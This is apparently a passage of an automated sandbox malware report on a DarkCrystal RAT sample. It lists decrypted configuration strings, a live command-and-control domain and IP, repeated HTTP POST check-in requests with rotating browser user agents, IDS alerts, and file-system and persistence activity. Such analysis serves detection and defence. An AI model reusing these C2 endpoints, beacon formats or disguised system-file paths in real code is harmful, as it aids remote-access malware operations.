                              Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-nQmtb0EsMA9tAW54k3K0","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmxlVWwzU1dwdmFXVXhUbHBWTVZKR1ZGVlNVMU5XV2tabVV6bFdZekpXZVdONU9HbE1RMGw0U1dwdmFWcHRSbk5qTWxWcFRFTkplVWxxYjJsYWJVWnpZekpWYVV4RFNYcEphbTlwWkVoS01WcFRTWE5KYWxGcFQybEtNR051Vm14SmFYZHBUbE5KTmtsdVVubGtWMVZwVEVOSk1rbHFiMmxrU0VveFdsTkpjMGxxWTJsUGFVcHRXVmQ0ZWxwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
                              Source: 00000000.00000002.1786930163.0000000012A0C000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://fsin.top/","javascriptCentraldownloads"]]
                              Source: WinPerfcommon.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDirectory created: C:\Program Files\Adobe\StartMenuExperienceHost.exeJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeDirectory created: C:\Program Files\Adobe\55b276f4edf653Jump to behavior
                              Source: WinPerfcommon.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: System.Windows.Forms.pdb source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA6B000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: bN.PDB source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA22000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.pdb source: WinPerfcommon.exe, 00000000.00000002.1747143226.00000000031DD000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62175 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62196 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62218 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62254 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62450 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62452 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62448 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62270 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62453 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62451 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62295 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62410 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62449 -> 37.44.238.250:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62447 -> 37.44.238.250:80
                              Uses ping.exe to check the status of other devices and networks
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: global trafficTCP traffic: 192.168.2.4:62172 -> 162.159.36.2:53
                              Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                              Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: fsin.top
                              Source: unknownHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: fsin.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:20:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:20:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:20:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:21:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:21:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:21:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:21:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:21:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:21:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:22:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 15:22:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
